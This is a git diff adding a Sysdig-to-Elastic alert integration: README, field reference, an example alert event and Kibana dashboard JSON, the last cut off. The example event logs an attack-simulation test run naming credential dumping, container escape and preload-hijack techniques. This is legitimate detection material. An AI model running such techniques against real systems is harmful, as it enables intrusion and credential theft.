@@ -0,0 +1,305 @@ +# Sysdig Integration +This integration allows for the shipping of [Sysdig](https://sysdig.com/) alerts to Elastic for observability and organizational awareness. Alerts can then be analyzed by using either the dashboard included with the integration or via the creation of custom dashboards within Kibana. + +## Data Streams +The Sysdig integration collects one type of data stream: alerts. + +**Alerts** The Alerts data stream collected by the Sysdig integration is comprised of Sysdig Alerts. See more details about Sysdig Alerts in [Sysdig's Alerts Documentation](https://docs.sysdig.com/en/docs/sysdig-monitor/alerts/). A complete list of potential fields used by this integration can be found in the [Logs reference](#logs-reference) + +## Requirements + +You need Elasticsearch for storing and searching your data and Kibana for visualizing and managing it. +You can use our hosted Elasticsearch Service on Elastic Cloud, which is recommended, or self-manage the Elastic Stack on your own hardware. + +Sysdig must be configured to output alerts to a supported output channel as defined in [Setup](#setup). The system will only receive common fields output by Sysdig's rules, meaning that if a rule does not include a desired field the rule must be edited in Sysdig to add the field. + +## Setup + +For step-by-step instructions on how to set up an integration, see the [Getting started](https://www.elastic.co/guide/en/welcome-to-elastic/current/getting-started-observability.html) guide. + +In order to capture alerts from Sysdig you **must** configure Sysdig to output Alerts as JSON via [HTTP](#http-input). + +### HTTP Input + +The HTTP input allows the Elastic Agent to receive Sysdig Alerts via HTTP webhook. 
+ +**Required:** To configure Sysdig to output JSON, you must set up as webhook notification channel as outlined in the [Sysdig Documentation](https://docs.sysdig.com/en/docs/administration/administration-settings/outbound-integrations/notifications-management/set-up-notification-channels/configure-a-webhook-channel/). + +## Logs Reference + +### alerts + +Sysdig alerts can contain a multitude of various fields pertaining to the type of activity on the host machine. + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp with nanos. | date | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| event.dataset | Data stream / event dataset. | constant_keyword | +| event.module | The module the event belongs to. | constant_keyword | +| input.type | | constant_keyword | +| sysdig.actions | | flattened | +| sysdig.agentId | Agent identifier | integer | +| sysdig.category | Event category from Sysdig | keyword | +| sysdig.containerId | Identifier of the container | text | +| sysdig.content.fields.container.image.tag | Tag for the container image | text | +| sysdig.content.fields.container.name | Name of the container | text | +| sysdig.content.fields.proc.cmdline | Command line args for the process | text | +| sysdig.content.fields.proc.cwd | Current working directory for the current process | text | +| sysdig.content.fields.proc.exepath | Path for the current process | text | +| sysdig.content.fields.proc.name | Name of the process | text | +| sysdig.content.fields.proc.pcmdline | Command line args for the parent process | text | +| sysdig.content.fields.proc.pid | Identifier for the process | text | +| sysdig.content.fields.proc.pname | Name of the parent process | text | +| sysdig.content.fields.proc.ppid | Identifier for the parent process | text | +| 
sysdig.content.fields.user.name | Name of the user | text | +| sysdig.content.fields.user.uid | Identifier for the user | text | +| sysdig.content.output | The raw event output | text | +| sysdig.content.policyOrigin | Originator of the rule associated with an event | text | +| sysdig.content.policyVersion | Version of the rule associated with an event | integer | +| sysdig.content.ruleName | Name of the rule associated with an event | text | +| sysdig.content.ruleTags | Tags associated with an event rule | text | +| sysdig.content.ruleType | Category of the rule associated with an event | text | +| sysdig.description | Description of the event policy | text | +| sysdig.event.category | | text | +| sysdig.event.description | | text | +| sysdig.event.type | | text | +| sysdig.hostMac | MAC address of the host machine | text | +| sysdig.id | Event identifier | text | +| sysdig.labels.azure.instanceId | Instance identifier for the azure instance | text | +| sysdig.labels.azure.instanceName | Instance name for the azure instance | text | +| sysdig.labels.azure.instanceSize | Size for the azure instance | text | +| sysdig.labels.cloudProvider.account.id | Account identifier for the cloud provider | text | +| sysdig.labels.cloudProvider.name | Name for the cloud provider | text | +| sysdig.labels.cloudProvider.region | Region for the cloud provider | text | +| sysdig.labels.gcp.availabilityZone | AZ for the gcp instance | text | +| sysdig.labels.gcp.instanceId | Instance identifier for the gcp instance | text | +| sysdig.labels.gcp.instanceName | Instance name for the gcp instance | text | +| sysdig.labels.gcp.machineType | Machine type for the gcp instance | text | +| sysdig.labels.gcp.projectId | Project identifier for the gcp instance | text | +| sysdig.labels.gcp.projectName | Project name for the gcp instance | text | +| sysdig.labels.host.hostName | Name of the current host | keyword | +| sysdig.labels.kubernetes.cluster.name | Name of the k8s cluster | text | +| 
sysdig.labels.kubernetes.namespace.name | Namespace of the k8s cluster | text | +| sysdig.labels.kubernetes.pod.name | Name of the k8s pod | text | +| sysdig.labels.kubernetes.workload.type | Type of k8s resource | text | +| sysdig.machineId | Identifier of the host machine | text | +| sysdig.name | Name of the event policy | text | +| sysdig.originator | | text | +| sysdig.severity | Numerical severity value associated with an event | integer | +| sysdig.source | Event source | text | +| sysdig.timestamp | Timestamp of the event | date | +| sysdig.timestampRFC3339Nano | | date | +| sysdig.type | In the case of policies, value should come through as "policy" | text | + + +**Example event** + +An example event for `alerts` looks as following: + +```json +{ + "@timestamp": "2024-09-12T13:06:12.675Z", + "agent": { + "ephemeral_id": "fe172d2f-7b14-4b87-bc5a-acc14684e4c5", + "id": "58014837", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.14.1" + }, + "cloud": { + "account": { + "id": "289645096542" + }, + "availability_zone": "us-central1-c", + "instance": { + "id": "648229130641697246", + "name": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "machine": { + "type": "e2-standard-4" + }, + "project": { + "id": "289645096542", + "name": "alliances-chronicle" + }, + "provider": "gcp", + "region": "us-central1" + }, + "container": { + "id": "6949e5f10829" + }, + "data_stream": { + "dataset": "sysdig.alerts", + "namespace": "15372", + "type": "logs" + }, + "ecs": { + "version": "8.0.0" + }, + "elastic_agent": { + "id": "a2d71da8-f67f-43fa-a895-0251c4a68bb0", + "snapshot": false, + "version": "8.14.1" + }, + "event": { + "agent_id_status": "mismatch", + "dataset": "sysdig.alerts", + "id": "17dec715376910362c8c3f62a4ceda2e", + "ingested": "2024-09-12T13:06:22Z", + "kind": "alert", + "provider": "syscall", + "severity": 7, + "timezone": "+00:00" + }, + "host": { + "id": "42:01:0a:80:00:05", + "mac": [ + "42-01-0A-80-00-05" + ], + "name": 
"gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "input": { + "type": "http_endpoint" + }, + "log": { + "syslog": { + "severity": { + "code": 7, + "name": "debug" + } + } + }, + "message": "Users management command userdel tmp_suid_user launched by pwsh on threatgen under user root (proc.name=userdel proc.args=tmp_suid_user fd.name= proc.cmdline=pwsh -c (./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 RECON.FIND.SUID T1611.002 CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC) proc.pname=pwsh gparent=containerd-shim ggparent= gggparent= container=container_id=6949e5f10829 container_name=threatgen evt.type=execve evt.arg.request= proc.pid=2140169 proc.cwd=/tmp/ proc.ppid=2140088 proc.pcmdline=pwsh -c (./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 RECON.FIND.SUID T1611.002 CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC) proc.sid=1 proc.exepath=/usr/sbin/userdel user.uid=0 user.loginuid=-1 user.loginname= user.name=root group.gid=0 group.name=root container.id=6949e5f10829 container.name=threatgen image=docker.io/dockerbadboy/art)", + "orchestrator": { + "cluster": { + "name": "gke-alliances-demo-6" + }, + "namespace": "default", + "resource": { + "name": "threatgen-c65cf6446-5s8kk", + "parent": { + "type": "deployment" + } + }, + "type": "kubernetes" + }, + "rule": { + "author": [ + "Sysdig" + ], + "category": "RULE_TYPE_FALCO", + "name": "User Management Event Detected", + "ruleset": "Sysdig Runtime Activity Logs", + "version": "35" + }, + "sysdig": { + "agentId": 58014837, + "category": "runtime", + "containerId": "6949e5f10829", + "content": { + "fields": { + "container.name": "threatgen", + "proc.cmdline": 
"userdel tmp_suid_user", + "proc.cwd": "/tmp/", + "proc.exepath": "/usr/sbin/userdel", + "proc.name": "userdel", + "proc.pcmdline": "pwsh -c (./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 RECON.FIND.SUID T1611.002 CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC)", + "proc.pid": "2140169", + "proc.pname": "pwsh", + "proc.ppid": "2140088", + "user.name": "root", + "user.uid": "0" + }, + "output": "Users management command userdel tmp_suid_user launched by pwsh on threatgen under user root (proc.name=userdel proc.args=tmp_suid_user fd.name= proc.cmdline=pwsh -c (./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 RECON.FIND.SUID T1611.002 CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC) proc.pname=pwsh gparent=containerd-shim ggparent= gggparent= container=container_id=6949e5f10829 container_name=threatgen evt.type=execve evt.arg.request= proc.pid=2140169 proc.cwd=/tmp/ proc.ppid=2140088 proc.pcmdline=pwsh -c (./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 RECON.FIND.SUID T1611.002 CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC) proc.sid=1 proc.exepath=/usr/sbin/userdel user.uid=0 user.loginuid=-1 user.loginname= user.name=root group.gid=0 group.name=root container.id=6949e5f10829 container.name=threatgen image=docker.io/dockerbadboy/art)", + "policyOrigin": "Sysdig", + "policyVersion": 35, + "ruleName": "User Management Event Detected", + "ruleTags": [ + "host", + "container", + "MITRE", + "MITRE_TA0003_persistence", + "MITRE_T1136_create_account", + 
"MITRE_T1136.001_create_account_local_account", + "MITRE_T1070_indicator_removal", + "MITRE_TA0005_defense_evasion", + "MITRE_TA0040_impact", + "MITRE_T1531_account_access_removal", + "MITRE_T1098_account_manipulation" + ], + "ruleType": "RULE_TYPE_FALCO" + }, + "description": "This policy contains rules which provide a greater insight into general activities occuring on the system. They are very noisy, but useful in threat hunting situations if you are looking for specific actions being taken during runtime. It is not recommended to use this policy for detection purposes unless tuning is enabled. Additional manual tuning will likely be required.", + "event": { + "category": "runtime", + "description": "This policy contains rules which provide a greater insight into general activities occuring on the system. They are very noisy, but useful in threat hunting situations if you are looking for specific actions being taken during runtime. It is not recommended to use this policy for detection purposes unless tuning is enabled. 
Additional manual tuning will likely be required.", + "type": "policy" + }, + "hostMac": "42:01:0a:80:00:05", + "id": "17dec715376910362c8c3f62a4ceda2e", + "labels": { + "cloudProvider": { + "account": { + "id": "289645096542" + }, + "name": "gcp", + "region": "us-central1" + }, + "gcp": { + "availabilityZone": "us-central1-c", + "instanceId": "648229130641697246", + "instanceName": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o", + "machineType": "e2-standard-4", + "projectId": "289645096542", + "projectName": "alliances-chronicle" + }, + "host": { + "hostName": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "kubernetes": { + "cluster": { + "name": "gke-alliances-demo-6" + }, + "namespace": { + "name": "default" + }, + "pod": { + "name": "threatgen-c65cf6446-5s8kk" + }, + "workload": { + "type": "deployment" + } + } + }, + "machineId": "42:01:0a:80:00:05", + "name": "Sysdig Runtime Activity Logs", + "originator": "policy", + "severity": 7, + "source": "syscall", + "timestamp": 1720031001639981000, + "timestampRFC3339Nano": "2024-07-03T18:23:21.63998111Z", + "type": "policy" + }, + "tags": [ + "host", + "container", + "MITRE", + "MITRE_TA0003_persistence", + "MITRE_T1136_create_account", + "MITRE_T1136.001_create_account_local_account", + "MITRE_T1070_indicator_removal", + "MITRE_TA0005_defense_evasion", + "MITRE_TA0040_impact", + "MITRE_T1531_account_access_removal", + "MITRE_T1098_account_manipulation" + ], + "threat.technique.id": [ + "T1136" + ] +} +``` \ No newline at end of file diff --git a/packages/sysdig/img/sysdig-events-screenshot.png b/packages/sysdig/img/sysdig-events-screenshot.png new file mode 100644 index 00000000000..1aece4e7612 Binary files /dev/null and b/packages/sysdig/img/sysdig-events-screenshot.png differ diff --git a/packages/sysdig/img/sysdig-logo-badge.svg b/packages/sysdig/img/sysdig-logo-badge.svg new file mode 100644 index 00000000000..bc13da3c2e8 --- /dev/null +++ b/packages/sysdig/img/sysdig-logo-badge.svg 
@@ -0,0 +1,27 @@ + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/packages/sysdig/kibana/dashboard/sysdig-fae0ccf1-e806-4876-a7fa-7258b094b15b.json b/packages/sysdig/kibana/dashboard/sysdig-fae0ccf1-e806-4876-a7fa-7258b094b15b.json new file mode 100644 index 00000000000..7dbb0888398 --- /dev/null +++ b/packages/sysdig/kibana/dashboard/sysdig-fae0ccf1-e806-4876-a7fa-7258b094b15b.json 
@@ -0,0 +1,1009 @@ +{ + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": { + "ignoreFilters": false, + "ignoreQuery": false, + "ignoreTimerange": false, + "ignoreValidations": false + }, + "panelsJSON": { + "04629dab-a612-46d1-ae42-4387909be583": { + "explicitInput": { + "enhancements": {}, + "fieldName": "rule.name", + "grow": true, + "id": "04629dab-a612-46d1-ae42-4387909be583", + "searchTechnique": "prefix", + "title": "Filter by Rule", + "width": "medium" + }, + "grow": true, + "order": 3, + "type": "optionsListControl", + "width": "medium" + }, + "04e85dec-ba9f-4c82-933f-7b0948c83609": { + "explicitInput": { + "enhancements": {}, + "fieldName": "host.name", + "grow": true, + "id": "04e85dec-ba9f-4c82-933f-7b0948c83609", + "searchTechnique": "prefix", + "title": "Filter by Host", + "width": "medium" + }, + "grow": true, + "order": 1, + "type": "optionsListControl", + "width": "medium" + }, + "5145797a-1b1a-4af7-a727-e78bc8f820f5": { + "explicitInput": { + "enhancements": {}, + "fieldName": "log.syslog.severity.name", + "grow": true, + "id": "5145797a-1b1a-4af7-a727-e78bc8f820f5", + "searchTechnique": "prefix", + "title": "Filter by Severity", + "width": "medium" + }, + "grow": true, + "order": 2, + "type": "optionsListControl", + "width": "medium" + }, + "5638457b-3f24-4bf0-9ef7-c80b2c10436d": { + "explicitInput": { + "enhancements": {}, + "fieldName": "orchestrator.resource.name", + "grow": true, + "id": "5638457b-3f24-4bf0-9ef7-c80b2c10436d", + "searchTechnique": "prefix", + "title": "Filter by Pod", + "width": "medium" + }, + "grow": true, + "order": 0, + "type": "optionsListControl", + "width": "small" + } + }, + "showApplySelections": false + }, + "description": "Managed dashboard for reviewing Alerts gathered via the Sysdig Integration", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": 
null, + "disabled": false, + "field": "data_stream.dataset", + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "sysdig.alerts" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "sysdig.alerts" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "description": "", + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "### Overview\n\nThis dashboard provides information about the Security Alerts collected by the Sysdig integration.\n\nAlerts are broken down by category, source, and type of event. 
Further investigation into the details of the individual Alerts can be done via Alert Stream display.\n\n", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } + }, + "gridData": { + "h": 14, + "i": "c82c4928-79d6-48a2-89b0-ded609749392", + "w": 14, + "x": 0, + "y": 0 + }, + "panelIndex": "c82c4928-79d6-48a2-89b0-ded609749392", + "title": "", + "type": "visualization" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-9352d482-2466-4287-8f85-cc92b8467ed3", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "9352d482-2466-4287-8f85-cc92b8467ed3": { + "columnOrder": [ + "be385bde-3dff-42d4-83ee-dc3f18a0aefe", + "370196fa-9403-4c03-b65a-264f76c9fe14" + ], + "columns": { + "370196fa-9403-4c03-b65a-264f76c9fe14": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "data_stream.dataset : \"sysdig.alerts\"" + }, + "isBucketed": false, + "label": "Alert Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "be385bde-3dff-42d4-83ee-dc3f18a0aefe": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "indexPatternId": "logs-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + 
"axisTitlesVisibilitySettings": { + "x": false, + "yLeft": true, + "yRight": true + }, + "layers": [ + { + "accessors": [ + "370196fa-9403-4c03-b65a-264f76c9fe14" + ], + "colorMapping": { + "assignments": [], + "colorMode": { + "type": "categorical" + }, + "paletteId": "eui_amsterdam_color_blind", + "specialAssignments": [ + { + "color": { + "type": "loop" + }, + "rule": { + "type": "other" + }, + "touched": false + } + ] + }, + "layerId": "9352d482-2466-4287-8f85-cc92b8467ed3", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "be385bde-3dff-42d4-83ee-dc3f18a0aefe" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "line", + "title": "Empty XY chart", + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {} + }, + "gridData": { + "h": 14, + "i": "7f8a3857-9646-4e87-a909-7836592adc1c", + "w": 17, + "x": 14, + "y": 0 + }, + "panelIndex": "7f8a3857-9646-4e87-a909-7836592adc1c", + "title": "Alerts Over Time [Logs Sysdig]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-e7feffed-f114-424a-9408-e0a423fae0ae", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "e7feffed-f114-424a-9408-e0a423fae0ae": { + "columnOrder": [ + "4dab2b7e-7121-4dce-a3f7-3c759b293f09", + "99f06fa2-3eeb-40f3-a072-92903b5653df", + "efded5ec-7c5e-4b12-bced-1ab15ae142e4" + ], + "columns": { + "4dab2b7e-7121-4dce-a3f7-3c759b293f09": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Hostname", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": 
"99f06fa2-3eeb-40f3-a072-92903b5653df", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "host.name" + }, + "99f06fa2-3eeb-40f3-a072-92903b5653df": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "data_stream.dataset : \"sysdig.alerts\"" + }, + "isBucketed": false, + "label": "Alert Count", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "efded5ec-7c5e-4b12-bced-1ab15ae142e4": { + "customLabel": true, + "dataType": "date", + "filter": { + "language": "kuery", + "query": "\"@timestamp\": * AND data_stream.dataset: \"sysdig.alerts\"" + }, + "isBucketed": false, + "label": "Most Recent Alert", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "@timestamp" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "indexPatternId": "logs-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "4dab2b7e-7121-4dce-a3f7-3c759b293f09", + "isMetric": false, + "isTransposed": false, + "width": 198.33333333333334 + }, + { + "alignment": "center", + "columnId": "99f06fa2-3eeb-40f3-a072-92903b5653df", + "isMetric": true, + "isTransposed": false + }, + { + "columnId": "efded5ec-7c5e-4b12-bced-1ab15ae142e4", + "isMetric": true, + "isTransposed": false + } + ], + "layerId": "e7feffed-f114-424a-9408-e0a423fae0ae", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {} + }, + "gridData": { + "h": 14, + "i": "c68eebc4-4682-49a0-88f7-22668fb883ad", + "w": 
17, + "x": 31, + "y": 0 + }, + "panelIndex": "c68eebc4-4682-49a0-88f7-22668fb883ad", + "title": "Alerts by Host - Top 10 [Logs Sysdig]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-b633214f-c828-455e-96c6-1ac90976ee31", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "b633214f-c828-455e-96c6-1ac90976ee31": { + "columnOrder": [ + "215e124b-982d-4057-9524-48517973596b", + "65cd62cf-dd7d-4c83-8718-d4418550e824", + "4e7188de-2148-4e71-bb2e-6678e1ee4e1d" + ], + "columns": { + "215e124b-982d-4057-9524-48517973596b": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Pod Name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "orderBy": { + "type": "custom" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "orchestrator.resource.name" + }, + "4e7188de-2148-4e71-bb2e-6678e1ee4e1d": { + "customLabel": true, + "dataType": "date", + "filter": { + "language": "kuery", + "query": "\"@timestamp\": * AND data_stream.dataset : \"sysdig.alerts\"" + }, + "isBucketed": false, + "label": "Most Recent Alert", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "@timestamp" + }, + "65cd62cf-dd7d-4c83-8718-d4418550e824": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "data_stream.dataset : \"sysdig.alerts\"" + }, + "isBucketed": false, 
+ "label": "Alert Count", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "215e124b-982d-4057-9524-48517973596b", + "isMetric": false, + "isTransposed": false + }, + { + "alignment": "center", + "columnId": "65cd62cf-dd7d-4c83-8718-d4418550e824", + "isMetric": true, + "isTransposed": false + }, + { + "columnId": "4e7188de-2148-4e71-bb2e-6678e1ee4e1d", + "isMetric": true, + "isTransposed": false + } + ], + "layerId": "b633214f-c828-455e-96c6-1ac90976ee31", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {} + }, + "gridData": { + "h": 15, + "i": "05632923-d5d0-4fb4-8e30-c4c91d625814", + "w": 24, + "x": 0, + "y": 14 + }, + "panelIndex": "05632923-d5d0-4fb4-8e30-c4c91d625814", + "title": "Alerts by Pod - Top 10 [Logs Sysdig]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-fceae10d-23d2-4b72-85ea-8f92cf73a437", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "fceae10d-23d2-4b72-85ea-8f92cf73a437": { + "columnOrder": [ + "597358bc-1934-42cb-b930-573f9f976ea7", + "77240ba1-7fd1-445e-9cfb-09e55cf0e788" + ], + "columns": { + "597358bc-1934-42cb-b930-573f9f976ea7": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Alert Severity Codes - Top 10", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + 
"missingBucket": false, + "orderBy": { + "columnId": "77240ba1-7fd1-445e-9cfb-09e55cf0e788", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "log.syslog.severity.name" + }, + "77240ba1-7fd1-445e-9cfb-09e55cf0e788": { + "dataType": "number", + "filter": { + "language": "kuery", + "query": "data_stream.dataset : \"sysdig.alerts\"" + }, + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "colorMapping": { + "assignments": [ + { + "color": { + "colorIndex": 0, + "paletteId": "eui_amsterdam_color_blind", + "type": "categorical" + }, + "rule": { + "type": "matchExactly", + "values": [] + }, + "touched": false + } + ], + "colorMode": { + "type": "categorical" + }, + "paletteId": "eui_amsterdam_color_blind", + "specialAssignments": [ + { + "color": { + "type": "loop" + }, + "rule": { + "type": "other" + }, + "touched": false + } + ] + }, + "layerId": "fceae10d-23d2-4b72-85ea-8f92cf73a437", + "layerType": "data", + "legendDisplay": "default", + "metrics": [ + "77240ba1-7fd1-445e-9cfb-09e55cf0e788" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "597358bc-1934-42cb-b930-573f9f976ea7" + ] + } + ], + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {} + }, + "gridData": { + "h": 15, + "i": "9cce2923-fcb6-4669-a18b-a6ce56bd7c6f", + "w": 24, + "x": 24, + "y": 14 + }, + "panelIndex": 
"9cce2923-fcb6-4669-a18b-a6ce56bd7c6f", + "title": "Alerts by Priority - Top 10 [Logs Sysdig]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-82eea8c4-375f-40ef-8a3f-a993d383826d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "82eea8c4-375f-40ef-8a3f-a993d383826d": { + "columnOrder": [ + "046f84d4-e094-48f7-86bd-9cd22a76b380", + "1cfbc396-e6f5-47be-b610-0d2f3bd36b39" + ], + "columns": { + "046f84d4-e094-48f7-86bd-9cd22a76b380": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Rule Name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "1cfbc396-e6f5-47be-b610-0d2f3bd36b39", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "rule.name" + }, + "1cfbc396-e6f5-47be-b610-0d2f3bd36b39": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "data_stream.dataset : \"sysdig.alerts\"" + }, + "isBucketed": false, + "label": "Alert Count", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + 